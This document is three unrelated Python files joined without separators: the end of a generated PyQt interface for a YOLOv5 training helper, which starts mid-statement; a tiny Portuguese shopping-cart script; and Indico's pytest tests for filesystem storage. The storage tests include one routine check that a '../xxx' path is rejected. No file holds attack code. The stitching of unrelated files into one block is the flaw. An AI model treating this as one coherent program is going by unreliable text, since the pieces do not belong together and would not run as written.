31)) self.generate_code.setMinimumSize(QtCore.QSize(0, 31)) self.generate_code.setObjectName("generate_code") self.choose_model = QtWidgets.QPushButton(self.groupBox_2) self.choose_model.setGeometry(QtCore.QRect(530, 80, 171, 31)) self.choose_model.setMinimumSize(QtCore.QSize(0, 31)) self.choose_model.setObjectName("choose_model") self.groupBox_3 = QtWidgets.QGroupBox(Yolov5TrainGuide) self.groupBox_3.setGeometry(QtCore.QRect(10, 280, 941, 621)) self.groupBox_3.setObjectName("groupBox_3") self.textBrowser = QtWidgets.QTextBrowser(self.groupBox_3) self.textBrowser.setGeometry(QtCore.QRect(10, 70, 921, 541)) self.textBrowser.setObjectName("textBrowser") self.startTrain = QtWidgets.QPushButton(self.groupBox_3) self.startTrain.setGeometry(QtCore.QRect(730, 30, 101, 31)) self.startTrain.setObjectName("startTrain") self.terminateTrain = QtWidgets.QPushButton(self.groupBox_3) self.terminateTrain.setGeometry(QtCore.QRect(840, 30, 91, 31)) self.terminateTrain.setObjectName("terminateTrain") self.layoutWidget2 = QtWidgets.QWidget(self.groupBox_3) self.layoutWidget2.setGeometry(QtCore.QRect(20, 30, 700, 33)) self.layoutWidget2.setObjectName("layoutWidget2") self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.layoutWidget2) self.horizontalLayout_3.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_3.setObjectName("horizontalLayout_3") self.useCondaEnv = QtWidgets.QCheckBox(self.layoutWidget2) self.useCondaEnv.setMinimumSize(QtCore.QSize(0, 31)) self.useCondaEnv.setObjectName("useCondaEnv") self.horizontalLayout_3.addWidget(self.useCondaEnv) self.envName = QtWidgets.QLineEdit(self.layoutWidget2) self.envName.setEnabled(True) self.envName.setMinimumSize(QtCore.QSize(400, 31)) self.envName.setReadOnly(True) self.envName.setObjectName("envName") self.horizontalLayout_3.addWidget(self.envName) self.browseConda = QtWidgets.QPushButton(self.layoutWidget2) self.browseConda.setMinimumSize(QtCore.QSize(0, 31)) self.browseConda.setObjectName("browseConda") self.horizontalLayout_3.addWidget(self.browseConda) self.label_9 = QtWidgets.QLabel(Yolov5TrainGuide) self.label_9.setGeometry(QtCore.QRect(100, 10, 761, 41)) font = QtGui.QFont() font.setPointSize(25) self.label_9.setFont(font) self.label_9.setAlignment(QtCore.Qt.AlignCenter) self.label_9.setObjectName("label_9") self.retranslateUi(Yolov5TrainGuide) QtCore.QMetaObject.connectSlotsByName(Yolov5TrainGuide) def retranslateUi(self, Yolov5TrainGuide): _translate = QtCore.QCoreApplication.translate Yolov5TrainGuide.setWindowTitle(_translate("Yolov5TrainGuide", "Yolov5 Train Guide")) self.groupBox.setTitle(_translate("Yolov5TrainGuide", "Dataset Preparation")) self.create_dir.setText(_translate("Yolov5TrainGuide", "Create Dir")) self.prepare.setText(_translate("Yolov5TrainGuide", "Generate Training Data")) self.label.setText(_translate("Yolov5TrainGuide", "Location")) self.browse.setText(_translate("Yolov5TrainGuide", "Browse")) self.label_2.setText(_translate("Yolov5TrainGuide", "Data Name")) self.label_3.setText(_translate("Yolov5TrainGuide", "Train Persentage")) self.label_7.setText(_translate("Yolov5TrainGuide", "%")) self.groupBox_2.setTitle(_translate("Yolov5TrainGuide", "Train Option")) self.label_4.setText(_translate("Yolov5TrainGuide", "Model Size")) self.model_size.setItemText(0, _translate("Yolov5TrainGuide", "small (s)")) self.model_size.setItemText(1, _translate("Yolov5TrainGuide", "mediun (m)")) self.model_size.setItemText(2, _translate("Yolov5TrainGuide", "large (l)")) self.model_size.setItemText(3, _translate("Yolov5TrainGuide", "extra large (x)")) self.label_6.setText(_translate("Yolov5TrainGuide", "Batch Size")) self.label_5.setText(_translate("Yolov5TrainGuide", "Train Epochs")) self.label_8.setText(_translate("Yolov5TrainGuide", "Use GPU Num")) self.default_model.setText(_translate("Yolov5TrainGuide", "Use Default Model Weight")) self.other_model.setText(_translate("Yolov5TrainGuide", "Use Other Model Weight")) self.generate_code.setText(_translate("Yolov5TrainGuide", "Generate Code")) self.choose_model.setText(_translate("Yolov5TrainGuide", "Choose Model")) self.groupBox_3.setTitle(_translate("Yolov5TrainGuide", "Message")) self.startTrain.setText(_translate("Yolov5TrainGuide", "Start Train")) self.terminateTrain.setText(_translate("Yolov5TrainGuide", "Terminate")) self.useCondaEnv.setText(_translate("Yolov5TrainGuide", "Choose Conda Env Dir")) self.browseConda.setText(_translate("Yolov5TrainGuide", "Browse")) self.label_9.setText(_translate("Yolov5TrainGuide", "YOLOv5 Train Guide Tool"))
from classes import Produto, Carrinho_Compra camisa = Produto('Camiseta', 50) calca = Produto('Tenis', 40) carrinho = Carrinho_Compra() carrinho.adiciona(camisa) carrinho.adiciona(calca) carrinho.mostra() print(carrinho.total())
# This file is part of Indico. # Copyright (C) 2002 - 2021 CERN # # Indico is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see the # LICENSE file for more details. from __future__ import unicode_literals import os from io import BytesIO import pytest from indico.core.storage import (FileSystemStorage, ReadOnlyFileSystemStorage, Storage, StorageError, StorageReadOnlyError) @pytest.fixture def fs_storage(tmpdir): return FileSystemStorage(tmpdir.strpath) @pytest.mark.parametrize('data', ('foo', 'foo=bar,', ',')) def test_parse_data_invalid(data): with pytest.raises(ValueError): Storage(None)._parse_data(data) @pytest.mark.parametrize(('data', 'expected'), ( ('foo=bar', {'foo': 'bar'}), ('foo = bar', {'foo': 'bar'}), ('foo = bar, hello= world ', {'foo': 'bar', 'hello': 'world'}), ('test=123,test2=True', {'test': '123', 'test2': 'True'}), )) def test_parse_data(data, expected): assert Storage(None)._parse_data(data) == expected @pytest.mark.usefixtures('request_context') def test_fs_errors(fs_storage): with pytest.raises(StorageError) as exc_info: fs_storage.open('xxx') assert 'Could not open' in unicode(exc_info.value) with pytest.raises(StorageError) as exc_info: fs_storage.send_file('xxx', 'unused/unused', 'unused') assert 'Could not send' in unicode(exc_info.value) with pytest.raises(StorageError) as exc_info: fs_storage.delete('xxx') assert 'Could not delete' in unicode(exc_info.value) with pytest.raises(StorageError) as exc_info: fs_storage.getsize('xxx') assert 'Could not get size' in unicode(exc_info.value) with pytest.raises(StorageError) as exc_info: fs_storage.open('../xxx') assert 'Invalid path' in unicode(exc_info.value) os.mkdir(fs_storage._resolve_path('secret'), 0o000) with pytest.raises(StorageError) as exc_info: fs_storage.save('secret/test.txt', 'unused/unused', 'unused', b'hello test') assert 'Could not save' in unicode(exc_info.value) os.rmdir(fs_storage._resolve_path('secret')) def test_fs_save_bytes(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello test') assert fs_storage.open(f).read() == b'hello test' def test_fs_save_fileobj(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', BytesIO(b'hello test')) assert fs_storage.open(f).read() == b'hello test' def test_fs_overwrite(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello test') with pytest.raises(StorageError) as exc_info: fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello fail') assert 'already exists' in unicode(exc_info.value) with fs_storage.open(f) as fd: assert fd.read() == b'hello test' def test_fs_dir(fs_storage): fs_storage.save('foo/test.txt', 'unused/unused', 'unused', b'hello test') # Cannot open directory with pytest.raises(StorageError) as exc_info: fs_storage.open('foo') assert 'Could not open' in unicode(exc_info.value) # Cannot create file colliding with the directory with pytest.raises(StorageError) as exc_info: fs_storage.save('foo', 'unused/unused', 'unused', b'hello test') assert 'Could not save' in unicode(exc_info.value) def test_fs_operations(fs_storage): f1, h1 = fs_storage.save('foo/bar/test.txt', 'unused/unused', 'unused', b'hello world') f2, h2 = fs_storage.save('foo/bar/test2.txt', 'unused/unused', 'unused', b'hello there') f3, h3 = fs_storage.save('test.txt', 'unused/unused', 'unused', b'very very long file' * 1024 * 1024) # check md5 checksums assert h1 == u'5eb63bbbe01eeed093cb22bb8f5acdc3' assert h2 == u'161bc25962da8fed6d2f59922fb642aa' assert h3 == u'd35ddfd803cbe8915f5c3ecd1d0523b4' with fs_storage.open(f1) as fd: assert fd.read() == b'hello world' with fs_storage.open(f2) as fd: assert fd.read() == b'hello there' with fs_storage.open(f3) as fd: assert len(fd.read()) == 19922944 assert fs_storage.getsize(f1) == 11 fs_storage.delete(f1) # only f1 should have been deleted with pytest.raises(StorageError): fs_storage.open(f1) with fs_storage.open(f2) as fd: assert fd.read() == b'hello there' with fs_storage.open(f3) as fd: assert len(fd.read()) == 19922944 @pytest.mark.usefixtures('request_context') def test_fs_send_file(fs_storage): f1, __ = fs_storage.save('foo/bar/test.txt', 'unused/unused', 'unused', b'hello world') response = fs_storage.send_file(f1, 'text/plain', 'filename.txt') assert 'text/plain' in response.headers['Content-type'] assert 'filename.txt' in response.headers['Content-disposition'] assert ''.join(response.response) == 'hello world' @pytest.mark.usefixtures('request_context') def test_fs_readonly(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello world') readonly = ReadOnlyFileSystemStorage(fs_storage.path) assert readonly.open(f).read() == b'hello world' assert readonly.send_file(f, 'test/plain', 'test.txt') assert readonly.getsize(f) == 11 with pytest.raises(StorageReadOnlyError): readonly.delete(f) with pytest.raises(StorageReadOnlyError): readonly.save('test2.txt', 'unused/unused', 'unused', b'hello fail') # just to make sure the file is still there assert readonly.open(f).read() == b'hello world' def test_fs_get_local_path(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello world') with fs_storage.get_local_path(f) as path: assert path == fs_storage._resolve_path(f) with open(path, 'rb') as fd: assert fd.read() == b'hello world' # fs storage returns the real path so it should still exist afterwards assert os.path.exists(path) def test_storage_get_local_path(fs_storage): class CustomStorage(FileSystemStorage): def get_local_path(self, file_id): return Storage.get_local_path(self, file_id) storage = CustomStorage(fs_storage.path) f, __ = storage.save('test.txt', 'unused/unused', 'unused', b'hello world') with storage.get_local_path(f) as path: with open(path, 'rb') as fd: assert fd.read() == b'hello world' assert not os.path.exists(path)